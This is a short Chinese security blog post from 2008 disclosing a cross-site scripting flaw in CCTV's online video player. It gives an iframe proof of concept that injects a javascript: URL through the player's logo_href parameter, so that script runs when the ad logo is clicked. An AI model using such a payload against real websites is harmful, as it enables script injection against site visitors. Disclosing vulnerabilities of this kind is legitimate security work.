首页 > 网络安全 > CCTV视频播放器XSS

CCTV视频播放器XSS

2008年8月10日 发表评论 阅读评论

先看一下CCTV1在线视频,点击haier 的广告 logo 标志将产生XSS:

<iframe src="http://t.live.cctv.com/cctvwebplay/cctvplayer.html?channel=cctv_p2p_cctv1&width=576&height=320&logo_href=javascript:alert(11111);" id="video"&nbsp;&nbsp;name=&#39;video&#39; frameborder="1" scrolling="no" style="height:352px;width:566px"></iframe>

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:CCTV视频播放器XSS
本文地址:http://www.woyigui.cn/2008/08/10/cctv-xss/

分类: 网络安全 标签:
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*